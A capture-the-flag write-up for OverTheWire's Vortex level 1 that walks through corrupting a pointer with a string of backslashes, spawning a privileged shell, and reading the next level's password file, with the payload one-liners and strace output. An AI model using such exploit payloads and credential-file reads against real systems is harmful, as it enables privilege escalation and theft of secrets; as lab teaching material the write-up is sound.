OverTheWire.org - Vortex - Level 1 Writeup

We have the code available, so it's a bit easier.
Basically we have a 512-byte buffer `buf` and a pointer `ptr`.
The memory layout, displayed from top to bottom, is:
|---------|
|  ptr    | --
|---------|  |
| buf     |  |
|         |  |
|         |  |
|         |<--

ptr is initially pointing in the middle of buf.
If we put a \ in the input, ptr is decremented.
If we put in a character that is not a newline, it is written to the location ptr points to.
But also a shell is executed when the value of ptr satisfies a condition checked in the source (this is what the 0xca byte written in the payload below is for).
By using gdb we know that ptr contains an address like 0xffffd4yy (in my case it was 0xffffd434)

We can use 261 \ to make ptr point just one byte ahead of itself.
Then overwrite it with a 0xca and a few valid bytes that resemble the original address.

vortex1@vortex:~$ python -c 'print "\\"*261 + "\xca\xfd\xff\xca"' | /vortex/vortex1
vortex1@vortex:~$

But it does nothing... or not?
Let's use strace and see...

vortex1@vortex:~$ python -c 'print "\\"*261 + "\xca\xfd\xff\xca"' | strace /vortex/vortex1
fstat64(0, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xfffffffff7fd6000
read(0, "\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"..., 4096) = 267
geteuid32()                             = 5001
geteuid32()                             = 5001
geteuid32()                             = 5001
setresuid32(5001, 5001, 5001)           = 0
execve("/bin/sh", ["sh"], [/* 34 vars */]) = 0
[ Process PID=800 runs in 64 bit mode. ]
brk(0)                                  = 0x555555774000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=27393, ...}) = 0
mmap(NULL, 27393, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ffff7ff0000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P \2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1857312, ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffff7fef000
mmap(NULL, 3965632, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ffff7a11000
mprotect(0x7ffff7bcf000, 2097152, PROT_NONE) = 0
mmap(0x7ffff7dcf000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1be000) = 0x7ffff7dcf000
mmap(0x7ffff7dd5000, 17088, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffff7dd5000
close(3)                                = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffff7fed000
arch_prctl(ARCH_SET_FS, 0x7ffff7fed740) = 0
mprotect(0x7ffff7dcf000, 16384, PROT_READ) = 0
mprotect(0x55555576f000, 8192, PROT_READ) = 0
mprotect(0x7ffff7ffc000, 4096, PROT_READ) = 0
munmap(0x7ffff7ff0000, 27393)           = 0
getpid()                                = 800
rt_sigaction(SIGCHLD, {0x555555566460, ~[RTMIN RT_1], SA_RESTORER, 0x7ffff7a47cb0}, NULL, 8) = 0
geteuid()                               = 5001
brk(0)                                  = 0x555555774000
brk(0x555555795000)                     = 0x555555795000
getppid()                               = 796
stat("/tmp/v1", {st_mode=S_IFDIR|0775, st_size=4096, ...}) = 0
stat(".", {st_mode=S_IFDIR|0775, st_size=4096, ...}) = 0
ioctl(0, SNDCTL_TMR_TIMEBASE or SNDRV_TIMER_IOCTL_NEXT_DEVICE or TCGETS, 0x7fffffffe310) = -1 ENOTTY (Inappropriate ioctl for device)
rt_sigaction(SIGINT, NULL, {SIG_DFL, [], 0}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL, ~[RTMIN RT_1], SA_RESTORER, 0x7ffff7a47cb0}, NULL, 8) = 0
rt_sigaction(SIGQUIT, NULL, {SIG_DFL, [], 0}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL, ~[RTMIN RT_1], SA_RESTORER, 0x7ffff7a47cb0}, NULL, 8) = 0
rt_sigaction(SIGTERM, NULL, {SIG_DFL, [], 0}, 8) = 0
rt_sigaction(SIGTERM, {SIG_DFL, ~[RTMIN RT_1], SA_RESTORER, 0x7ffff7a47cb0}, NULL, 8) = 0
read(0, "", 8192)                       = 0
exit_group(0)                           = ?
+++ exited with 0 +++

Well, it executes the shell in interactive mode, but stdin is a pipe rather than a terminal: the ioctl() call fails with ENOTTY, and the shell then reads EOF from stdin (read(0, "", 8192) = 0) and exits.
Usually this can be bypassed by keeping the shell's input open and having it output the password file...

We can pass something to the vortex1 process that it will in turn pass on to the interactive shell, like this:

vortex1@vortex:~$ (python -c 'print "\\"*261 + "\xca\xfd\xff\xca"'; echo "cat /etc/vortex_pass/vortex2") | /vortex/vortex1
2*******E
vortex1@vortex:~$ 
